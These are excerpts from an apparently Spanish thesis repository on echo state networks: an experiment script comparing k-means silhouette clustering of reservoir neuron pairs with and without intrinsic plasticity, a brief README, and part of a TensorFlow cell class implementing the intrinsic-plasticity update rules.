                            # Compute the silhouette scores for each sample
                            sample_silhouette_values = silhouette_samples(points, cluster_labels)
                            y_lower = 10
                            for p in range(n_clusters):
                                # Aggregate the silhouette scores for samples belonging to
                                # cluster p, and sort them
                                ith_cluster_silhouette_values = \
                                    sample_silhouette_values[cluster_labels == p]
                                ith_cluster_silhouette_values.sort()
                                size_cluster_i = ith_cluster_silhouette_values.shape[0]
                                y_upper = y_lower + size_cluster_i
                                color = cm.nipy_spectral(float(p) / n_clusters)
                                ax1.fill_betweenx(np.arange(y_lower, y_upper),
                                                  0, ith_cluster_silhouette_values,
                                                  facecolor=color, edgecolor=color, alpha=0.7)
                                # Label the silhouette plots with their cluster numbers at the middle
                                ax1.text(-0.05, y_lower + 0.5 * size_cluster_i, str(p))
                                # Compute the new y_lower for next plot
                                y_lower = y_upper + 10 # 10 for the 0 samples
                            ax1.set_title("El diagrama de silueta para los diversos clusters.")
                            ax1.set_xlabel("Valores de coeficientes de silueta")
                            ax1.set_ylabel("Etiqueta de cluster")
                            # The vertical line for average silhouette score of all the values
                            ax1.axvline(x=silhouette_avg, color="red", linestyle="--")
                            ax1.set_yticks([]) # Clear the yaxis labels / ticks
                            ax1.set_xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])
                            # 2nd Plot showing the actual clusters formed
                            colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)
                            ax2.scatter(points[:, 0], points[:, 1], marker='.', s=30, lw=0, alpha=0.7,
                                        c=colors, edgecolor='k')
                            # Labeling the clusters
                            centers = clusterer.cluster_centers_
                            # Draw white circles at cluster centers
                            ax2.scatter(centers[:, 0], centers[:, 1], marker='o',
                                        c="white", alpha=1, s=200, edgecolor='k')
                            for p, c in enumerate(centers):
                                ax2.scatter(c[0], c[1], marker='$%d$' % p, alpha=1,
                                            s=50, edgecolor='k')
                            ax2.set_title("Visualización de los datos agrupados.")
                            ax2.set_xlabel("Espacio de características para neurona "+str(i))
                            ax2.set_ylabel("Espacio de características para neurona "+str(j))
                            plt.suptitle(("Análisis de silueta mediante K Means sin Plasticidad Intrínseca "
                                          " con n_clusters = %d" % n_clusters,
                                          " y coeficiente = %.8f" % silhouette_avg),
                                         fontsize=14, fontweight='bold')
                            plt.savefig(
                                savePath + experimentName + '/fig_neurons_No_IP_' + str(i) + '_' + str(j) + '_round_' + str(
                                    z) + '.pdf')
                            plt.close('all')
                    print('pares analizados: '+str(aux_pares))
                    # --- Spectral radius before IP, then run up to 3 epochs of
                    # intrinsic-plasticity optimisation and re-embed the data. ---
                    #Ploteo Radio Spectral
                    sr = esn.getSpectralRadius()
                    Radius1 = S.run(sr)
                    print('El radio spectral es: ' + str(Radius1))
                    #Verificacion del Reservorio
                    wr=esn.getReservoirWeights()
                    reservoirState= S.run(wr)
                    # Optimizacion del reservorio mediante IP
                    for e in range(3): # Un maximo de 3 epocas
                        print('Optimization:',e)
                        indx = np.random.choice(trainIPdata.shape[0], len(trainIPdata), replace=False) # Mezclar los puntos de datos
                        y_ip,gain,bias=esn.optimizeIPscan(tf.constant(trainIPdata[indx,:],dtype=tf.float32))
                        h_prev,GainRun,BiasRun = S.run([y_ip, gain, bias])
                        print(GainRun)
                        # Ejecucion con IP
                        print("Ejecucion con IP...")
                        # outputs, final_state = tf.nn.dynamic_rnn(esn, data_t, dtype=tf.float32)
                        # washed = tf.squeeze(tf.slice(outputs, [0, washout_size, 0], [-1, -1, -1]))
                        print("Computing embeddings...")
                        res = S.run(washed)
                        # Histogramas para ver la estructura de los datos (las distribuciones)
                        if units >= 10:
                            aux = 10 # Lo dejamos clavado en 10 para unicamente ver las distribuciones de las 10 primeras neuronas. Esto para resevorios con mas de 10 unidades
                        if units < 10:
                            aux = units
                        f, a = plt.subplots(aux, 1, figsize=(12, 22)) # Lo dejamos clavado en 10 para unicamente ver las distribuciones de las 10 primeras neuronas
                        plt.subplots_adjust(bottom=.08, top=.92, left=.1, right=.95, hspace=0.8, wspace=0.35)
                        a = a.ravel()
                        for idx, ax in enumerate(a):
                            ax.hist(res[:, -1, idx], 200, range=(-1, 1)) # Lo que hay en res son las activaciones del reservorio
                            ax.set_title('Neurona del Reservorio: ' + str(idx))
                            # ax.set_xlabel('Intervalo [-1,1]')
                            # ax.set_ylabel('Y')
                        # plt.tight_layout()
                        # f.suptitle('Distribuciones sin Plasticidad Intrínseca', fontsize=30) # Creo q es mejor poner en el titulo de la imagen en el latex
                        #plt.show()
                        f.savefig(savePath+experimentName+'/fig_with_IP_optim_'+str(e)+'_round_'+str(z)+'.pdf')
                        plt.close('all')
                    # Graficos de pares de neuronas (Ahora con IP)
                    # Ploteo radio spectral despues de la Optimizacion
                    sr = esn.getSpectralRadius()
                    Radius2 = S.run(sr)
                    print('El radio spectral es despues de IP: ' + str(Radius2))
                    # --- Same pairwise cluster analysis, now on the
                    # IP-optimised reservoir activations. ---
                    withIP_Silhouette_BestScores = []
                    withIP_bestScores_clusters = []
                    withIP_pairs = []
                    withIP_3cluster_scores = []
                    withIP_Silhouette_score=[]
                    withIP_samples_count = []
                    withIP_4clusters_samples_count = []
                    withIP_6clusters_samples_count = []
                    aux_pares = 0
                    # Clusters en los pares de neuronas
                    for i in range(units-1):
                        for j in range(i+1,units):
                            print('Par de neuronas: ' + str(i) + '_' + str(j))
                            aux_pares += 1
                            #plt.figure()
                            #fig, ax = plt.subplots(1, 1, figsize=(6, 6))
                            # define the data
                            x = res[:, -1, i] # -1 indica el ultimo paso de tiempo
                            y = res[:, -1, j]
                            points = np.transpose(np.vstack((x, y)))
                            # Obtencion del numero estimado de clusters
                            scores = []
                            for n_clusters in range_n_clusters:
                                # Initialize the clusterer with n_clusters value and a random generator
                                # seed of 10 for reproducibility.
                                clusterer = KMeans(n_clusters=n_clusters, random_state=10)
                                cluster_labels = clusterer.fit_predict(points)
                                # The silhouette_score gives the average value for all the samples.
                                # This gives a perspective into the density and separation of the formed
                                # clusters
                                silhouette_avg = silhouette_score(points, cluster_labels)
                                scores.append([n_clusters, silhouette_avg])
                            max_indx = np.argmax(scores, axis=0) # Obtenemos los indices del mayor silhouette score
                            bestScore = scores[max_indx[1]] # obtenemos el par [n_clusters,best_score]
                            n_clusters = bestScore[0] # El nuevo n_clusters # Aqui vendria la condicion if n_clusters == 3, plotearse
                            withIP_Silhouette_BestScores.append(bestScore[1])
                            withIP_bestScores_clusters.append(bestScore[0])
                            withIP_pairs.append('Par_' + str(i) + '_' + str(j))
                            if n_clusters == 3: #or n_clusters == 4:
                                withIP_Silhouette_score.append(bestScore[1])
                                withIP_3cluster_scores.append(['Par_' + str(i) + '_' + str(j), bestScore,n_clusters])
                            # Create a subplot with 1 row and 2 columns
                            fig, (ax1, ax2) = plt.subplots(1, 2)
                            fig.set_size_inches(18, 7)
                            # The 1st subplot is the silhouette plot
                            # The silhouette coefficient can range from -1, 1 but in this example all
                            # lie within [-0.1, 1]
                            ax1.set_xlim([-0.1, 1])
                            # The (n_clusters+1)*10 is for inserting blank space between silhouette
                            # plots of individual clusters, to demarcate them clearly.
                            ax1.set_ylim([0, len(points) + (n_clusters + 1) * 10])
                            # Volvemos a hacer la clusterizacion
                            clusterer = KMeans(n_clusters=n_clusters, random_state=10)
                            cluster_labels = clusterer.fit_predict(points)
                            silhouette_avg = silhouette_score(points, cluster_labels)
                            # Compute the silhouette scores for each sample
                            sample_silhouette_values = silhouette_samples(points, cluster_labels)
                            # Contamos la cantidad de muestras por clase (o cluster)
                            unique_elements, counts_elements = np.unique(np.array(cluster_labels),
                                                                         return_counts=True)
                            withIP_samples_count.append([unique_elements, counts_elements,'Par_' + str(i) + '_' + str(j)])
                            if max(unique_elements) == 5: # Esto para cuando clusteriza 6 grupos
                                withIP_6clusters_samples_count.append(np.sort(counts_elements))
                            if max(unique_elements) == 3: # Esto para cuando clusteriza 4 grupos
                                withIP_4clusters_samples_count.append(np.sort(counts_elements))
                            y_lower = 10
                            for p in range(n_clusters):
                                # Aggregate the silhouette scores for samples belonging to
                                # cluster p, and sort them
                                ith_cluster_silhouette_values = \
                                    sample_silhouette_values[cluster_labels == p]
                                ith_cluster_silhouette_values.sort()
                                size_cluster_i = ith_cluster_silhouette_values.shape[0]
                                y_upper = y_lower + size_cluster_i
                                color = cm.nipy_spectral(float(p) / n_clusters)
                                ax1.fill_betweenx(np.arange(y_lower, y_upper),
                                                  0, ith_cluster_silhouette_values,
                                                  facecolor=color, edgecolor=color, alpha=0.7)
                                # Label the silhouette plots with their cluster numbers at the middle
                                ax1.text(-0.05, y_lower + 0.5 * size_cluster_i, str(p))
                                # Compute the new y_lower for next plot
                                y_lower = y_upper + 10 # 10 for the 0 samples
                            ax1.set_title("El diagrama de silueta para los diversos clusters.")
                            ax1.set_xlabel("Valores de coeficientes de silueta")
                            ax1.set_ylabel("Etiqueta de cluster")
                            # The vertical line for average silhouette score of all the values
                            ax1.axvline(x=silhouette_avg, color="red", linestyle="--")
                            ax1.set_yticks([]) # Clear the yaxis labels / ticks
                            ax1.set_xticks([-0.1, 0, 0.2, 0.4, 0.6, 0.8, 1])
                            # 2nd Plot showing the actual clusters formed
                            colors = cm.nipy_spectral(cluster_labels.astype(float) / n_clusters)
                            ax2.scatter(points[:, 0], points[:, 1], marker='.', s=30, lw=0, alpha=0.7,
                                        c=colors, edgecolor='k')
                            # Labeling the clusters
                            centers = clusterer.cluster_centers_
                            # Draw white circles at cluster centers
                            ax2.scatter(centers[:, 0], centers[:, 1], marker='o',
                                        c="white", alpha=1, s=200, edgecolor='k')
                            for p, c in enumerate(centers):
                                ax2.scatter(c[0], c[1], marker='$%d$' % p, alpha=1,
                                            s=50, edgecolor='k')
                            ax2.set_title("Visualización de los datos agrupados.")
                            ax2.set_xlabel("Espacio de características para neurona "+str(i))
                            ax2.set_ylabel("Espacio de características para neurona "+str(j))
                            plt.suptitle(("Análisis de silueta mediante K Means con Plasticidad Intrínseca "
                                          " con n_clusters = %d" % n_clusters,
                                          " y coeficiente = %.8f" % silhouette_avg),
                                         fontsize=14, fontweight='bold')
                            plt.savefig(savePath + experimentName + '/fig_neurons_With_IP_' + str(i)+'_' + str(j) +'_round_'+str(z)+ '.pdf')
                            #plt.show()
                            plt.close('all')
                    print('pares analizados: ' + str(aux_pares))
                    # --- Mean sample count per cluster (columns are the sorted
                    # per-cluster counts collected above), for 4- and 6-cluster
                    # outcomes, with and without IP. ---
                    # Obtencion de medias de muestras por clase y almacenamiento para el caso sin IP y con IP
                    # Sin IP
                    if len(noIP_4clusters_samples_count) >= 1:
                        meanclass0 = np.mean(np.array(noIP_4clusters_samples_count)[:, 0])
                        meanclass1 = np.mean(np.array(noIP_4clusters_samples_count)[:, 1])
                        meanclass2 = np.mean(np.array(noIP_4clusters_samples_count)[:, 2])
                        meanclass3 = np.mean(np.array(noIP_4clusters_samples_count)[:, 3])
                        noIP_4clusters_meansamples_count = [meanclass0,meanclass1,meanclass2,meanclass3]
                    else:noIP_4clusters_meansamples_count =['Ningun par obtuvo 4 grupos']
                    if len(noIP_6clusters_samples_count) >= 1:
                        meanclass0 = np.mean(np.array(noIP_6clusters_samples_count)[:, 0])
                        meanclass1 = np.mean(np.array(noIP_6clusters_samples_count)[:, 1])
                        meanclass2 = np.mean(np.array(noIP_6clusters_samples_count)[:, 2])
                        meanclass3 = np.mean(np.array(noIP_6clusters_samples_count)[:, 3])
                        meanclass4 = np.mean(np.array(noIP_6clusters_samples_count)[:, 4])
                        meanclass5 = np.mean(np.array(noIP_6clusters_samples_count)[:, 5])
                        noIP_6clusters_meansamples_count = [meanclass0, meanclass1, meanclass2, meanclass3, meanclass4, meanclass5]
                    else:noIP_6clusters_meansamples_count =['Ningun par obtuvo 6 grupos']
                    # Con IP
                    if len(withIP_4clusters_samples_count) >= 1:
                        meanclass0 = np.mean(np.array(withIP_4clusters_samples_count)[:, 0])
                        meanclass1 = np.mean(np.array(withIP_4clusters_samples_count)[:, 1])
                        meanclass2 = np.mean(np.array(withIP_4clusters_samples_count)[:, 2])
                        meanclass3 = np.mean(np.array(withIP_4clusters_samples_count)[:, 3])
                        withIP_4clusters_meansamples_count = [meanclass0, meanclass1, meanclass2, meanclass3]
                    else:withIP_4clusters_meansamples_count = ['Ningun par obtuvo 4 grupos']
                    if len(withIP_6clusters_samples_count) >= 1:
                        meanclass0 = np.mean(np.array(withIP_6clusters_samples_count)[:, 0])
                        meanclass1 = np.mean(np.array(withIP_6clusters_samples_count)[:, 1])
                        meanclass2 = np.mean(np.array(withIP_6clusters_samples_count)[:, 2])
                        meanclass3 = np.mean(np.array(withIP_6clusters_samples_count)[:, 3])
                        meanclass4 = np.mean(np.array(withIP_6clusters_samples_count)[:, 4])
                        meanclass5 = np.mean(np.array(withIP_6clusters_samples_count)[:, 5])
                        withIP_6clusters_meansamples_count = [meanclass0, meanclass1, meanclass2, meanclass3, meanclass4,
                                                              meanclass5]
                    else:withIP_6clusters_meansamples_count = ['Ningun par obtuvo 6 grupos']
# Creamos un diccionario de los parametros para Imprimir en un .txt algunos de los parametros
params = {'washout_size':washout_size,'scale':scale,'connectivity':connectivity,'Number_of_labels':N
,'time_steps':time_steps,'max_length':max_length,'initial_crop':initial_crop,'maxSamples':maxSamples,'maxTrainingSamples':maxTrainingSamples
,'increment':increment,'channels':channels,'mean':mean,'std':std,'learning_rate':learning_rate
,'Architecture':str(experimentName),'num_epochs':3,'batch_size':maxSamples*N,'Spectral_Radius_No_IP':Radius1
,'Spectral_Radius_after_IP':Radius2,'Gain_Vector':str(GainRun),'Bias_Vector':str(BiasRun), 'Last_state':str(h_prev)
,'Rules':str(rules),'reservoirState':str(reservoirState),'withIP_Silhouette_BestScores':str(withIP_Silhouette_BestScores),'withIP_bestScores_clusters':str(withIP_bestScores_clusters)
,'withIP_pairs':str(withIP_pairs),'withIP_3cluster_scores':str(withIP_3cluster_scores),'noIP_Silhouette_BestScores':str(noIP_Silhouette_BestScores),'noIP_bestScores_clusters':str(noIP_bestScores_clusters)
,'noIP_pairs':str(noIP_pairs),'noIP_3clusters_scores':str(noIP_3clusters_scores)
,'noIP_2clusters_count':noIP_bestScores_clusters.count(2),'noIP_3clusters_count':noIP_bestScores_clusters.count(3),'noIP_4clusters_count':noIP_bestScores_clusters.count(4),'noIP_5clusters_count':noIP_bestScores_clusters.count(5),'noIP_6clusters_count':noIP_bestScores_clusters.count(6),'noIP_7clusters_count':noIP_bestScores_clusters.count(7),'noIP_8clusters_count':noIP_bestScores_clusters.count(8)
,'withIP_2clusters_count':withIP_bestScores_clusters.count(2),'withIP_3clusters_count':withIP_bestScores_clusters.count(3),'withIP_4clusters_count':withIP_bestScores_clusters.count(4), 'withIP_5clusters_count':withIP_bestScores_clusters.count(5), 'withIP_6clusters_count':withIP_bestScores_clusters.count(6), 'withIP_7clusters_count':withIP_bestScores_clusters.count(7), 'withIP_8clusters_count':withIP_bestScores_clusters.count(8)
,'mean_silhouette_score_withIP':str(np.mean(withIP_Silhouette_score)),'mean_silhouette_score_noIP':str(np.mean(noIP_Silhouette_score)),'silhouette_score_withIP':str(withIP_Silhouette_score),'silhouette_score_noIP':str(noIP_Silhouette_score),'withIP_samples_count_ofclusters':str(withIP_samples_count),'noIP_samples_count_ofclusters':str(noIP_samples_count)
,'noIP_4clusters_meansamples_count':str(noIP_4clusters_meansamples_count),'noIP_6clusters_meansamples_count':str(noIP_6clusters_meansamples_count),'withIP_4clusters_meansamples_count':str(withIP_4clusters_meansamples_count),'withIP_6clusters_meansamples_count':str(withIP_6clusters_meansamples_count)}
writeDictinTXTfile(savePath, experimentName, params,z)
print('Datos_Parametros_Guardados')
# Almacenamiento de metricas para el resumen
evolutionSR_NoIP.append(Radius1)
evolutionSR_WithIP.append(Radius2)
noIP_2clusters_count.append(noIP_bestScores_clusters.count(2))
noIP_3clusters_count.append(noIP_bestScores_clusters.count(3))
noIP_4clusters_count.append(noIP_bestScores_clusters.count(4))
noIP_5clusters_count.append(noIP_bestScores_clusters.count(5))
noIP_6clusters_count.append(noIP_bestScores_clusters.count(6))
noIP_7clusters_count.append(noIP_bestScores_clusters.count(7))
noIP_8clusters_count.append(noIP_bestScores_clusters.count(8))
withIP_2clusters_count.append(withIP_bestScores_clusters.count(2))
withIP_3clusters_count.append(withIP_bestScores_clusters.count(3))
withIP_4clusters_count.append(withIP_bestScores_clusters.count(4))
withIP_5clusters_count.append(withIP_bestScores_clusters.count(5))
withIP_6clusters_count.append(withIP_bestScores_clusters.count(6))
withIP_7clusters_count.append(withIP_bestScores_clusters.count(7))
withIP_8clusters_count.append(withIP_bestScores_clusters.count(8))
Silouethe_scores_means_IP.append(str(np.mean(withIP_Silhouette_score)))
Silouethe_scores_means_noIP.append(str(np.mean(noIP_Silhouette_score)))
noIP_samples_4clusters_count.append(noIP_4clusters_meansamples_count)
noIP_samples_6clusters_count.append(noIP_6clusters_meansamples_count)
withIP_samples_4clusters_count.append(withIP_4clusters_meansamples_count)
withIP_samples_6clusters_count.append(withIP_6clusters_meansamples_count)
#Conteo de muestras por grupo promedio de las 10 rondas
# #No Ip
# meanclass0 = np.mean(np.array(noIP_samples_4clusters_count)[:, 0])
# meanclass1 = np.mean(np.array(noIP_samples_4clusters_count)[:, 1])
# meanclass2 = np.mean(np.array(noIP_samples_4clusters_count)[:, 2])
# meanclass3 = np.mean(np.array(noIP_samples_4clusters_count)[:, 3])
#
# noIP_4clusters_mean10rounds_samplescount = [meanclass0, meanclass1, meanclass2, meanclass3]
#
# meanclass0 = np.mean(np.array(noIP_samples_6clusters_count)[:, 0])
# meanclass1 = np.mean(np.array(noIP_samples_6clusters_count)[:, 1])
# meanclass2 = np.mean(np.array(noIP_samples_6clusters_count)[:, 2])
# meanclass3 = np.mean(np.array(noIP_samples_6clusters_count)[:, 3])
# meanclass4 = np.mean(np.array(noIP_samples_6clusters_count)[:, 4])
# meanclass5 = np.mean(np.array(noIP_samples_6clusters_count)[:, 5])
#
# noIP_6clusters_mean10rounds_samplescount = [meanclass0, meanclass1, meanclass2, meanclass3, meanclass4, meanclass5]
#
# # Con IP
# meanclass0 = np.mean(np.array(withIP_samples_4clusters_count)[:, 0])
# meanclass1 = np.mean(np.array(withIP_samples_4clusters_count)[:, 1])
# meanclass2 = np.mean(np.array(withIP_samples_4clusters_count)[:, 2])
# meanclass3 = np.mean(np.array(withIP_samples_4clusters_count)[:, 3])
#
# withIP_4clusters_mean10rounds_samplescount = [meanclass0, meanclass1, meanclass2, meanclass3]
#
# meanclass0 = np.mean(np.array(withIP_samples_6clusters_count)[:, 0])
# meanclass1 = np.mean(np.array(withIP_samples_6clusters_count)[:, 1])
# meanclass2 = np.mean(np.array(withIP_samples_6clusters_count)[:, 2])
# meanclass3 = np.mean(np.array(withIP_samples_6clusters_count)[:, 3])
# meanclass4 = np.mean(np.array(withIP_samples_6clusters_count)[:, 4])
# meanclass5 = np.mean(np.array(withIP_samples_6clusters_count)[:, 5])
#
# withIP_6clusters_mean10rounds_samplescount = [meanclass0, meanclass1, meanclass2, meanclass3, meanclass4,
# meanclass5]
summary = {'washout_size':washout_size,'scale':scale,'connectivity':connectivity,'Number_of_labels':N
,'time_steps':time_steps,'max_length':max_length,'initial_crop':initial_crop,'maxSamples':maxSamples,'maxTrainingSamples':maxTrainingSamples
,'increment':increment,'channels':channels,'mean':mean,'std':std,'learning_rate':learning_rate
,'Architecture':str(experimentName),'num_IP_epochs':3,'batch_size':maxSamples*N
,'Rules':str(rules),'evolutionSR_NoIP':str(evolutionSR_NoIP),'evolutionSR_WithIP':str(evolutionSR_WithIP)
,'noIP_2clusters_count':str(noIP_2clusters_count),'noIP_3clusters_count':str(noIP_3clusters_count),'noIP_4clusters_count':str(noIP_4clusters_count),'noIP_5clusters_count':str(noIP_5clusters_count),'noIP_6clusters_count':str(noIP_6clusters_count),'noIP_7clusters_count':str(noIP_7clusters_count),'noIP_8clusters_count':str(noIP_8clusters_count)
,'withIP_2clusters_count':str(withIP_2clusters_count),'withIP_3clusters_count':str(withIP_3clusters_count),'withIP_4clusters_count':str(withIP_4clusters_count),'withIP_5clusters_count':str(withIP_5clusters_count),'withIP_6clusters_count':str(withIP_6clusters_count),'withIP_7clusters_count':str(withIP_7clusters_count),'withIP_8clusters_count':str(withIP_8clusters_count),'noIP_Silhouette_score_6clusters':str(noIP_Silhouette_score)
,'withIP_Silhouette_score_6clusters':str(withIP_Silhouette_score),'mean_noIP_2clusters_count':str(np.mean(noIP_2clusters_count)),'mean_noIP_3clusters_count':str(np.mean(noIP_3clusters_count)),'mean_noIP_4clusters_count':str(np.mean(noIP_4clusters_count)),'mean_noIP_5clusters_count':str(np.mean(noIP_5clusters_count)),'mean_noIP_6clusters_count':str(np.mean(noIP_6clusters_count)),'mean_noIP_7clusters_count':str(np.mean(noIP_7clusters_count)),'mean_noIP_8clusters_count':str(np.mean(noIP_8clusters_count))
,'mean_withIP_2clusters_count':str(np.mean(withIP_2clusters_count)),'mean_withIP_3clusters_count':str(np.mean(withIP_3clusters_count)),'mean_withIP_4clusters_count':str(np.mean(withIP_4clusters_count)),'mean_withIP_5clusters_count':str(np.mean(withIP_5clusters_count)),'mean_withIP_6clusters_count':str(np.mean(withIP_6clusters_count)),'mean_withIP_7clusters_count':str(np.mean(withIP_7clusters_count)),'mean_withIP_8clusters_count':str(np.mean(withIP_8clusters_count))
,'Silouethe_scores_means_IP':str(Silouethe_scores_means_IP),'Silouethe_scores_means_noIP':str(Silouethe_scores_means_noIP),'noIP_4clusters_mean10rounds_samplescount':str(noIP_samples_4clusters_count),'noIP_6clusters_mean10rounds_samplescount':str(noIP_samples_6clusters_count),'withIP_4clusters_mean10rounds_samplescount':str(withIP_samples_4clusters_count),'withIP_6clusters_mean10rounds_samplescount':str(withIP_samples_6clusters_count)}
writeDictinTXTfile(savePath, experimentName, summary, 'summary')
print('Datos_Resumen_Guardados')
<file_sep>/README.md
# TFM
Reservorios y Optimización con IP
<file_sep>/esn_ip_cell.py
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.framework.ops import convert_to_tensor
import tensorflow as tf
class ESNIPCell(
rnn_cell_impl.RNNCell): # la clase ESNIPCell vendria a ser como una subclase de rnn_cell_impl.RNNCell, esto ayuda a proporcionar el estado cero
"""Echo State Network Cell.
Based on http://www.faculty.jacobs-university.de/hjaeger/pubs/EchoStatesTechRep.pdf
Only the reservoir, the randomized recurrent layer, is modelled. The readout trainable layer
which map reservoir output to the target output is not implemented by this cell,
thus neither are feedback from readout to the reservoir (a quite common technique).
Here a practical guide to use Echo State Networks:
http://minds.jacobs-university.de/sites/default/files/uploads/papers/PracticalESN.pdf
Since at the moment TF doesn't provide a way to compute spectral radius
of a matrix the echo state property necessary condition `max(eig(W)) < 1` is approximated
scaling the norm 2 of the reservoir matrix which is an upper bound of the spectral radius.
See https://en.wikipedia.org/wiki/Matrix_norm, the section on induced norms.
Every `RNNCell` must have the properties below and implement `call` with
the signature `(output, next_state) = call(input, state)`. The optional
third input argument, `scope`, is allowed for backwards compatibility
purposes; but should be left off for new subclasses.
This definition of cell differs from the definition used in the literature.
In the literature, 'cell' refers to an object with a single scalar output.
This definition refers to a horizontal array of such units.
An RNN cell, in the most abstract setting, is anything that has
a state and performs some operation that takes a matrix of inputs.
"""
    def __init__(self, num_units, wr2_scale=0.7, connectivity=0.3, leaky=1.0, activation=math_ops.tanh, scope=None,
                 input_size=1, dtype=tf.float32, mean=0., std=0.6, learning_rate=0.001,
                 win_init=init_ops.random_normal_initializer(),
                 # Los parametros input_size y dtype tratar de pasarlos desde fuera
                 wr_init=init_ops.random_normal_initializer(),
                 bias_init=init_ops.random_normal_initializer()):
        """Initialize the Echo State Network Cell.
        Args:
          num_units: Int or 0-D Int Tensor, the number of units in the reservoir
          wr2_scale: desired norm2 of reservoir weight matrix.
            `wr2_scale < 1` is a sufficient condition for echo state property.
          connectivity: connection probability between two reservoir units
          leaky: leaky parameter
          activation: activation function
          input_size: number of input channels fed to the cell at each step
          dtype: TensorFlow dtype used for the cell's variables
          mean: target mean of the intrinsic-plasticity (IP) output distribution
          std: target standard deviation of the IP output distribution
          learning_rate: step size of the IP gain/bias update rule
          win_init: initializer for input weights
          wr_init: used to initialize reservoir weights before applying connectivity mask and scaling
          bias_init: initializer for biases
        """
        # Plain attribute storage — no graph construction happens here.
        self._num_units = num_units
        self._leaky = leaky
        self._activation = activation
        self._input_size = input_size  # Ingresar como argumento cuando se instancia la clase ESN
        self._dtype = dtype
        self.__scope = scope
        self._mean = mean
        self._learning_rate = learning_rate
        self._std = std
        def _wr_initializer(shape, dtype, partition_info=None):
            # Sparse reservoir init: random weights, masked to the requested
            # connectivity, then rescaled so the matrix norm-2 equals
            # wr2_scale (an upper bound on the spectral radius).
            wr = wr_init(shape, dtype=dtype)
            connectivity_mask = math_ops.cast(
                math_ops.less_equal(
                    random_ops.random_uniform(shape),
                    connectivity),
                dtype)
            wr = math_ops.multiply(wr, connectivity_mask)
            wr_norm2 = math_ops.sqrt(math_ops.reduce_sum(math_ops.square(wr)))
            # Guard against an all-zero draw to avoid division by zero.
            is_norm_0 = math_ops.cast(math_ops.equal(wr_norm2, 0), dtype)
            wr = wr * wr2_scale / (wr_norm2 + 1 * is_norm_0)
            return wr
        self._win_initializer = win_init
        self._bias_initializer = bias_init
        self._wr_initializer = _wr_initializer
    @property
    def output_size(self):
        # One output activation per reservoir unit.
        return self._num_units
@property
def state_size(self):
    """Size of the recurrent state: one value per reservoir unit."""
    return self._num_units
def get_states(self, y_prev, data_val):
    """One tf.scan step of the intrinsic-plasticity (IP) pre-training.

    `y_prev` is the flat carry of the previous step: the reservoir state
    followed by the gain vector `a` and bias vector `b` (3 * num_units values).
    `data_val` is the current input sample. Returns the new flat carry
    [state, a, b] after applying one IP update.
    """
    h_prev = y_prev[0:self._num_units]
    a = y_prev[self._num_units:2*self._num_units]
    b = y_prev[2*self._num_units:3*self._num_units]
    h_prev = tf.reshape(h_prev, [1, self._num_units])  # h_prev plays the role of the recurrent state
    data_val = tf.reshape(data_val,
                          [1, self._input_size])  # needed because h_prev and data_val arrive flattened, e.g. (30,) and (3,)
    #with vs.variable_scope(self.__scope or type(self).__name__, reuse=tf.AUTO_REUSE): # "ESNCell"
    #with vs.variable_scope('rnn/ESNIPCell', reuse=tf.AUTO_REUSE):
    win = vs.get_variable("InputMatrix", [self._input_size, self._num_units], dtype=self._dtype,
                          trainable=False, initializer=self._win_initializer)
    wr = vs.get_variable("ReservoirMatrix", [self._num_units, self._num_units], dtype=self._dtype,
                         trainable=False, initializer=self._wr_initializer)
    diag_a = tf.diag(a)  # (num_units, num_units), e.g. 30x30
    _wr = math_ops.matmul(diag_a, wr)  # gain-scaled reservoir, 30x30
    _win = math_ops.matmul(win, diag_a)  # gain-scaled input weights, e.g. 3x30
    # h_prev/state starts at zeros on the first scan step
    in_mat = array_ops.concat([data_val, h_prev], axis=1)  # concat[1x3, 1x30] -> 1x33
    weights_mat = array_ops.concat([_win, _wr], axis=0)  # concat[3x30, 30x30] -> 33x30
    # Pre-activation x and output y used by the IP rules
    x_a = math_ops.matmul(in_mat, weights_mat) + b  # 1x30 + 1x30
    y_ip = self._activation(x_a)  # 1x30
    # IP update rules for the tanh activation; other rules would be needed
    # here for a fermi (sigmoid) activation.
    g_b = -self._learning_rate * (-(self._mean / tf.pow(self._std, 2)) + (y_ip / tf.pow(self._std, 2)) * (
        2 * tf.pow(self._std, 2) + 1 - tf.pow(y_ip, 2) + self._mean * y_ip))
    g_a = (self._learning_rate / a) + g_b * x_a
    _a = a + g_a
    _b = b + g_b
    # Fold the updated a and b back into the flat carry
    c = tf.squeeze(_a)  # NOTE(review): original asked whether assign() should also be applied here
    d = tf.squeeze(_b)
    return tf.concat([tf.squeeze(y_ip), c, d], axis=0)
def optimizeIPscan(self, train_sequence):
    """Run intrinsic-plasticity pre-training over `train_sequence` with tf.scan.

    Scans `get_states` over the sequence starting from a zero reservoir state,
    then assigns the final gain vector `a` and bias `b` back into the shared
    'rnn/ESNIPCell' variables. Returns (final_state, assign_a_op, assign_b_op).
    """
    with vs.variable_scope('rnn/ESNIPCell', reuse=tf.AUTO_REUSE):
        # IP parameters: gain a and bias b
        a = vs.get_variable("GainVector", [self._num_units], dtype=self._dtype,
                            trainable=True, initializer=tf.ones_initializer())
        b = vs.get_variable("Bias", [self._num_units], dtype=self._dtype, trainable=True,
                            initializer=tf.zeros_initializer())
        initial_state = tf.zeros([self._num_units])
        initial_state = tf.concat([initial_state, a, b], axis=0)
        #data = tf.squeeze(train_sequence)
        ip_states = tf.scan(self.get_states, train_sequence, initializer=initial_state)
        states = ip_states[-1, :]  # NOTE(review): original was unsure this is right (not a dynamic rnn)
        h_final = states[0:self._num_units]
        c = a.assign(states[self._num_units:2*self._num_units])
        d = b.assign(states[2*self._num_units: 3*self._num_units])
        # Take the last scan state, split out a and b, and assign them back
        return h_final, c, d
def getSpectralRadius(self):
    """Return a norm of the gain-scaled reservoir matrix.

    NOTE(review): despite the name, this computes the Frobenius (element-wise
    2-) norm of diag(a) @ Wr + b, not the spectral radius (largest absolute
    eigenvalue) — confirm which quantity is intended.
    """
    with vs.variable_scope('rnn/ESNIPCell', reuse=tf.AUTO_REUSE):
        wr = vs.get_variable("ReservoirMatrix", [self._num_units, self._num_units], dtype=self._dtype,
                             trainable=False, initializer=self._wr_initializer)
        a = vs.get_variable("GainVector", [self._num_units], dtype=self._dtype,
                            trainable=True, initializer=tf.ones_initializer())
        b = vs.get_variable("Bias", [self._num_units], dtype=self._dtype, trainable=True,
                            initializer=tf.zeros_initializer())
